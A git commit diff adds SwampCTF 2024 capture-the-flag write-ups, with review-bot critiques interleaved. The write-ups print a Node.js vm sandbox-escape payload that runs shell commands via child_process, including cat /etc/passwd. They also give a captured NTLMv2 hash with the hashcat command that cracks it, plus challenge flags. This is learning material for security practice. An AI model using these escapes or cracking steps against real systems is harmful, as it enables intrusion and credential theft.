feat: added swampctf 2024

main
daffainfo 2024-04-08 20:47:31 +07:00
parent 8dbfb74c94
commit 2e8faacfde
15 changed files with 228 additions and 28 deletions

@ -49,7 +49,6 @@ List of CTF events that i have joined before
| HackTM Quals 2023 | Yes | [Link](/2023/HackTM%20Quals%202023/) |
| VU CYBERTHON 2023 | Yes | [Link](/2023/VU%20CYBERTHON%202023/) |
| WxMCTF 2023 | Yes | [Link](/2023/WxMCTF%202023/) |
| Cyber Security Challenge Germany 2023 | No | - |
| CTF After Dark - Winter 2023 | Yes | [Link](/2023/CTF%20After%20Dark%20-%20Winter%202023/) |
| KalmarCTF 2023 | Yes | [Link](/2023/KalmarCTF%202023/) |
| Nullcon HackIM CTF 2023 | Yes | [Link](/2023/Nullcon%20HackIM%20CTF%202023/) |
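Review bot: this hunk (and the three that follow on the same file) does more than the commit message `feat: added swampctf 2024` says: the line counts in the `@@` headers (7 to 6, 19 to 14, 36 to 25, 12 to 5) match exactly the number of `No` rows in each hunk, so the change is dropping every 2023 event that has no writeup, e.g. `| Cyber Security Challenge Germany 2023 | No | - |`. Either split that cleanup into its own commit or state it in the message, and note that once every remaining row says `Yes` the `Writeup Available?` column no longer carries information.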
@ -79,19 +78,14 @@ List of CTF events that i have joined before
| ICSJWG Spring 2023 | Yes | [Link](/2023/ICSJWG%20CTF%202023/) |
| DeadSec CTF 2023 | Yes | [Link](/2023/DeadSec%20CTF%202023/) |
| BYUCTF 2023 | Yes | [Link](/2023/BYUCTF%202023/) |
| Grey CTF 2023 Qualifiers | No | - |
| Security Fest CTF 2023 | Yes | [Link](/2023/Security%20Fest%20CTF%202023/) |
| TJCTF 2023 | Yes | [Link](/2023/TJCTF%202023/) |
| BxMCTF 2023 | Yes | [Link](/2023/BxMCTF%202023/) |
| DanteCTF 2023 | Yes | [Link](/2023/DanteCTF%202023/) |
| Break the Syntax CTF 2023 | No | - |
| JustCTF 2023 | Yes | [Link](/2023/justCTF%202023/) |
| HSCTF 2023 | Yes | [Link](/2023/HSCTF%202023/) |
| GPN CTF 2023 | Yes | [Link](/2023/GPN%20CTF%202023/) |
| n00bzCTF 2023 | No | - |
| BCACTF 2023 | No | - |
| SEETF 2023 | Yes | [Link](/2023/SEETF%202023/) |
| Africa battleCTF 2023 prequal | No | - |
| Google CTF 2023 | Yes | [Link](/2023/Google%20CTF%202023/) |
| UIUCTF 2023 | Yes | [Link](/2023/UIUCTF%202023/) |
| CryptoCTF 2023 | Yes | [Link](/2023/CryptoCTF%202023/) |
@ -101,36 +95,25 @@ List of CTF events that i have joined before
| AmateursCTF 2023 | Yes | [Link](/2023/AmateursCTF%202023/) |
| BDSec CTF 2023 | Yes | [Link](/2023/BDSec%20CTF%202023/) |
| The Odyssey CTF | Yes | [Link](/2023/The%20Odyssey%20CTF/) |
| TFC CTF 2023 | No | - |
| ASC Cyber Wargames Qualification 2023 | Yes | [Link](/2023/ASC%20Cyber%20Wargames%20Qualification%202023/) |
| LIT CTF 2023 | No | - |
| DeconstruCT.F 2023 | Yes | [Link](/2023/DeconstruCT.F%202023/) |
| Tenable CTF 2023 | Yes | [Link](/2023/Tenable%20CTF%202023/) |
| CCCamp 2023 | Yes | [Link](/2023/CCCamp%202023/) |
| h4ckc0n 2023 | Yes | [Link](/2023/h4ckc0n%202023/) |
| Sekai CTF 2023 | No | - |
| DownUnderCTF 2023 | Yes | [Link](/2023/DownUnderCTF%202023/) |
| PatriotCTF 2023 | No | - |
| Cyber Heroines CTF | No | - |
| Urmia CTF 2023 | No | - |
| CSAW CTF Qual 2023 2023 | Yes | [Link](/2023/CSAW%20CTF%20Qualification%20Round%202023/) |
| Winja CTF 2023 | Yes | [Link](/2023/Winja%20CTF%202023/) |
| Buckeye CTF 2023 | Yes | [Link](/2023/Buckeye%20CTF%202023/) |
| SunshineCTF 2023 | Yes | [Link](/2023/SunshineCTF%202023/) |
| DefCamp Capture the Flag (D-CTF) 2023 Quals | Yes | [Link](/2023/DefCamp%20Capture%20the%20Flag%20(D-CTF)%202023%20Quals/) |
| ASEAN Student Contest on Information Security Qualification 2023 | No | - |
| ASEAN Student Contest on Information Security Semi-Final 2023 | No | - |
| Srdnlen CTF 2023 | Yes | [Link](/2023/Srdnlen%20CTF%202023/) |
| BlueHens CTF 2023 | Yes | [Link](/2023/BlueHens%20CTF%202023/) |
| EKOPARTY CTF 2023 | Yes | [Link](/2023/EKOPARTY%20CTF%202023/) |
| TSG CTF 2023 | Yes | [Link](/2023/TSG%20CTF%202023/) |
| 1337UP LIVE CTF | Yes | [Link](/2023/1337UP%20LIVE%20CTF/) |
| NewportBlakeCTF 2023 | Yes | [Link](/2023/NewportBlakeCTF%202023/) |
| Hackappatoi CTF '23 | No | - |
| pingCTF 2023 | Yes | [Link](/2023/pingCTF%202023/) |
| The Cyber Cooperative CTF | Yes | [Link](/2023/The%20Cyber%20Cooperative%20CTF/) |
| BackdoorCTF 2023 | No | - |
| 1st Annual TCM Invitational CTF | No | - |
| niteCTF 2023 | Yes | [Link](/2023/niteCTF%202023/) |
### Local Events
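Review bot: `| CSAW CTF Qual 2023 2023 | Yes | [Link](/2023/CSAW%20CTF%20Qualification%20Round%202023/) |` repeats the year in the event name; it should read `CSAW CTF Qual 2023` (or match the directory name `CSAW CTF Qualification Round 2023`). While touching this table, add a blank line before `### Local Events` so the heading is visibly separated from the last row.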
@ -138,12 +121,5 @@ List of CTF events that i have joined before
| ---------- | ------------------ | ------------ |
| CTF Secur{i}e The System | Yes | [Link](/2023/CTF%20Secur{i}e%20The%20System/) |
| Cyber Jawara 2023 - Umum | Yes | [Link](/2023/Cyber%20Jawara%202023%20-%20Umum/) |
| Information and Technology Festival 2023 | No | - |
| 0ByteCTF 2023 | Yes | [Link](/2023/0ByteCTF%202023/) |
| N45HTCTF2023 2023 | No | - |
| Infinity CTF Final 2023 | No | - |
| Infinity CTF Qualifier 2023 | No | - |
| Unity CTF Final 2023 | No | - |
| Unity CTF Qualifier 2023 | No | - |
| JOINTS CTF Qualifier 2023 | No | - |
| CTF ARA 2023 | Yes | [Link](/2023/CTF%20ARA%202023/) |

@ -0,0 +1,22 @@
# Employee Evaluation
> This company sucks. They're ranking all the employees against one another, and they keep putting security to the sideline. The CISO told me that they don't care about actual code quality, just fancy buzzwords and looking nice. I want to get out of here, but I can't without this dang secret code. It's for, uh, good things, and not sharing secrets. This exposed evaluation script seems like a good start. Can you help me out?
## About the Challenge
We got a server to connect, here is a preview of the challenge
![preview](images/preview.png)
The first thing that comes to my mind is `bash jail`
## How to Solve?
At first I tried to use `ls` payload and here was the result
![testing input](images/testing_input.png)
It looks like we need to close the curly brackets first and then execute an OS command. In this case, the flag was located in env variables
![flag](images/flag.png)
```
swampCTF{eva1_c4t_pr0c_3nvir0n_2942}
```
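Review bot: the actual payload is never written down; "close the curly brackets first and then execute an OS command" survives only in the screenshots, so quote the exact input that produced `swampCTF{eva1_c4t_pr0c_3nvir0n_2942}`. The label `bash jail` also sits oddly next to that flag text, which spells out eval, cat, proc, environ: it suggests an `eval`-style interpreter jail where the flag is read from the process environment via `/proc`, not a shell jail. Name the interpreter the evaluation script runs in and say in one line why the secret was in an environment variable rather than a file, since that is the whole trick the reader is meant to learn.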

@ -0,0 +1,20 @@
# Notoriously Tricky Login Mess (Part 1)
> We found out a user account has been compromised on our network. We took a packet capture of the time that we believe the remote login happened. Can you find out what the username of the compromised account is?
> swampCTF{username}
## About the Challenge
We got a `pcapng` file that contains winrm traffic
![preview](images/preview.png)
## How to Solve?
To solve this chall, im using `http` filter and then sort by `info`
![flag](images/flag.png)
As we can see, there are 2 users (Administrator and adamkadaban)
```
swampCTF{adamkadaban}
```
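Review bot: "using `http` filter and then sort by `info`" is not reproducible from the text. State which packets carry the usernames (the NTLMSSP authentication messages inside the WinRM HTTP requests, which Part 2 relies on as well) and why `Administrator` is rejected in favour of `adamkadaban` when, as the writeup says, both names appear. A display filter such as `ntlmssp` isolates those packets more directly than sorting the Info column, and quoting the packet number would let a reader verify the answer from the same capture.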

@ -0,0 +1,47 @@
# Notoriously Tricky Login Mess (Part 2)
> Great job finding the username! We want to find out the password of the account now to see how it was so easily breached. Can you help?
## About the Challenge
Now, we need to find `adamkadaban` password
## How to Solve?
To solve this chall, im using this [blog](https://web.archive.org/web/20200930000459/https://www.root9b.com/newsroom/attacking-windows-fallback-authentication/) as a reference. First we need to build the ntlmv2 hash first, here is formula:
```
{Username}::{Hostname}:{Server Challenge}:{NTProofstr}{NTLMv2 Response}
```
* Username:
We already got the username which is `adamkadaban`
* Hostname:
null
* Server Challenge
![alt text](images/server-challenge.png)
* NTProofstr
![alt text](images/ntlmv2-response%20and%20ntproofstr.png)
* NTLMv2 Response
![alt text](images/ntlmv2-response%20and%20ntproofstr.png)
Now combine every part you have already found, and then crack it using hashcat.
```
ADAMKADABAN:::1fed9e8e0ca470a3:98ebffae0b77865893846dfadb757cfb:0101000000000000801c50dbc266da0188d48d08eff230a80000000002001e0045004300320041004d0041005a002d00450033003300530047004c00380001001e0045004300320041004d0041005a002d00450033003300530047004c00380004001e0045004300320041004d0041005a002d00450033003300530047004c00380003001e0045004300320041004d0041005a002d00450033003300530047004c003800070008005783ebd6c266da010000000000000000
```
```
hashcat -m 5600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```
```
swampCTF{emilyyoudontknowmypassword}
```
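Review bot: the formula `{Username}::{Hostname}:{Server Challenge}:{NTProofstr}{NTLMv2 Response}` does not match the hash that was actually cracked. That hash reads `ADAMKADABAN:::1fed9e8e0ca470a3:98ebffae...:0101...`, i.e. an empty field between `::` and the challenge, and a colon between the NTProofStr and the response. The middle field is the domain from the NTLMSSP AUTH message (empty here, hence `:::`), not the hostname, and the last field is the NTLMv2 response with its first 16 bytes, the NTProofStr, stripped, which is why it starts at the `0101` blob signature. Suggest writing the formula as `{Username}::{Domain}:{Server Challenge}:{NTProofStr}:{NTLMv2 Response without the leading NTProofStr}`, and saying that hashcat `-m 5600` expects exactly that layout: a misplaced colon or a blob that still contains the NTProofStr is rejected as malformed or simply never cracks.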

@ -0,0 +1,6 @@
# SwampCTF 2024
CTF writeup for The SwampCTF 2024. I took part in this CTF competition with the TCP1P team and secured the 57th place out of 794 teams
| Category | Challenge |
| --- | --- |
| Web | [Blog](/2023/HackTM%20Quals%202023/Blog/)
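Review bot: the challenge index is a leftover from another README: `| Web | [Blog](/2023/HackTM%20Quals%202023/Blog/)` points at HackTM Quals 2023, and none of the four writeups this commit adds (Employee Evaluation, Notoriously Tricky Login Mess parts 1 and 2, Reptilian Server) are listed. Replace it with one row per writeup under the `/2024/<event>/<challenge>/` pattern the rest of the repo uses, with the right category for each, and close the row with a trailing `|` like the other tables.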

@ -0,0 +1,131 @@
# Reptilian Server
> You are a human spy sent to gather information on a new centralized computing station that the Reptilians have developed, and is being used to house important secrets. In order to blend in, you learned the Reptilian language, which is similar to English except there are no spaces and you can't talk for too long.
> Using your unique skillset, gather as much information from the Reptilians as you can. If you can tell us how they started the server we can replicate it ourselves. There may be a flag in it for you if you do.
> The flag will be in the standard format for SwampCTF.
## About the Challenge
We got a server to connect and also Javascript source code called `server.js`. Here is the content of `server.js`:
```javascript
const vm = require('node:vm');
const net = require('net');
// Get the port from the environment variable (default to 3000)
const PORT = process.env.PORT || 3000;
// Create a TCP server
const server = net.createServer((sock) => {
console.log('Client connected!');
sock.write(`Welcome to the ReptilianRealm! Please wait while we setup the virtual environment.\n`);
const box = vm.createContext(Object.create({
console: {
log: (output) => {
sock.write(output + '\n');
}
},
eval: (x) => eval(x)
}));
sock.write(`Environment created, have fun playing with the environment!\n`);
sock.on('data', (data) => {
const c = data.toString().trim();
if (c.indexOf(' ') >= 0 || c.length > 60) {
sock.write("Intruder Alert! Removing unwelcomed spy from centeralized computing center!");
sock.end();
return;
}
try {
const s = new vm.Script(c);
s.runInContext(box, s);
} catch (e) {
sock.write(`Error executing command: ${e.message} \n`);
}
});
sock.on('end', () => { console.log('Client disconnected!'); });
});
// Handle server errors
server.on('error', (e) => {
console.error('Server error:', e);
});
// Start the server listening on correct port.
server.listen(PORT, () => {
console.log(`Server listening on port ${PORT}`);
});
```
We can execute a JS code but there are 2 restriction here:
* There must be no whitespace in the input
* The length of each input cannot exceed 60 characters
## How to Solve?
To solve this chall, Im using this repository as a reference (https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet) and then I saw `vm module breakout` section
```js
"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);
```
Because we can't enter a string that exceeds 60 characters, so I just divided it into several variables. To bypass space constraints, I use `String.fromCharCode(32)` which is the equivalent of spaces
```js
space=String.fromCharCode(32)
d="return"+space+"this.process"
proc=this.constructor.constructor(d)();
la=proc.mainModule.require('child_process');
console.log(la.execSync('ls').toString())
console.log(la.execSync('cat${IFS}Dockerfile').toString())
```
![flag](images/flag.png)
> btw I solved this challenge using unintended ways. Here is the solution provided by the author, which I found by reading the `solution.md` file on the server
```
console.log(la.execSync('cat${IFS}*.md').toString())
# Challenge
You are a human spy sent to gather information on a new centralized computing station that the Reptilians have developed, and is being used to house important secrets. In order to blend in, you learned the Reptilian language, which is similar to English except there are no spaces and you can't talk for too long.
Using your unique skillset, gather as much information from the Reptilians as you can. If you can tell us how they started the server we can replicate it ourselves. There may be a flag in it for you if you do.
The flag will be in the standard format for SwampCTF.# Solution to Reptilian Server
The solution to this challenge is complex, and the main difficulty is in establishing the VM escape.
Its easy to see from the dockerfile that the flag will be provided as an argument to the process running the server.
In order to access that flag, you must escape the VM which runs your commands. This payload would normally do the trick:
console.log((this.constructor.constructor('return (process.argv)'))())
However, to blend in with the reptillians we need to shorten this payload and remove the spaces from it.
To shorten the payload, we can break it up into sections by storing parts of the payload in variables, like so:
let b='return (process.argv)'
let a=this.constructor.constructor(b);
console.log(a())
Then, in order to write this without any spaces, we can use a combination of String.fromCharCode and a unicode character "Paragraph Separator" (U+2029)
to rewrite the payload without spaces, solving the challenge.
letb='return+String.fromCharCode("160")+(process.argv)'
leta=this.constructor.constructor(b);
console.log(a())
```
```
swampCTF{Unic0d3_F0r_Th3_W1n}
```
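Review bot: the quoted author solution at the end will not run as pasted. The prose says the whitespace substitute is U+2029 (Paragraph Separator), but `letb='return+String.fromCharCode("160")+(process.argv)'` and `leta=this.constructor.constructor(b);` have lost the invisible separator between `let` and the variable name in rendering, so as shown they assign globals named `letb` and `leta`, and `b` is never defined. Mark the character visibly (for example `let\u2029b=...`) or say explicitly that it is present but invisible; it passes the filter because `c.indexOf(' ')` only looks for U+0020. Also note that in the quoted payload the `String.fromCharCode("160")` call sits inside the string literal, so the constructed function body is literally `return+String.fromCharCode("160")+(process.argv)`; that parses as a unary plus and still returns a string containing `argv`, but it is not the `return (process.argv)` with a whitespace substitute the text describes. Separately, `server.js` hands the sandbox `eval: (x) => eval(x)`, a direct `eval` closed over the host module scope where `require` and `process` live, so a one-line `eval(...)` escape works without the `this.constructor.constructor` chain at all; worth a sentence, since it is the more obvious hole in the source shown above.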

@ -40,13 +40,11 @@ List of CTF events that i have joined before
### Global Events
| Event Name | Writeup Available? | Writeup Link |
| ---------- | ------------------ | ------------ |
| IrisCTF 2024 | No | - |
| New Year CTF 2024 | No | - |
| UofTCTF 2024 | Yes | [Link](/2024/UofTCTF%202024/) |
| KnightCTF 2024 | Yes | [Link](/2024/KnightCTF%202024/) |
| Mapna CTF 2024 | No | - |
| TetCTF 2024 | Yes | [Link](/2024/TetCTF%202024/) |
| L3HCTF 2024 | No | - |
| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
| UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
### Local Events
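Review bot: `| 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |` appears twice in this hunk, and the row between them, `| UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |`, links to the 0xL4ugh directory instead of its own writeup; drop the duplicate and fix the link. No SwampCTF 2024 row is visible here either, even though this commit adds the SwampCTF 2024 writeups; if it is added further down the file that is fine, otherwise the new writeups are unreachable from the index.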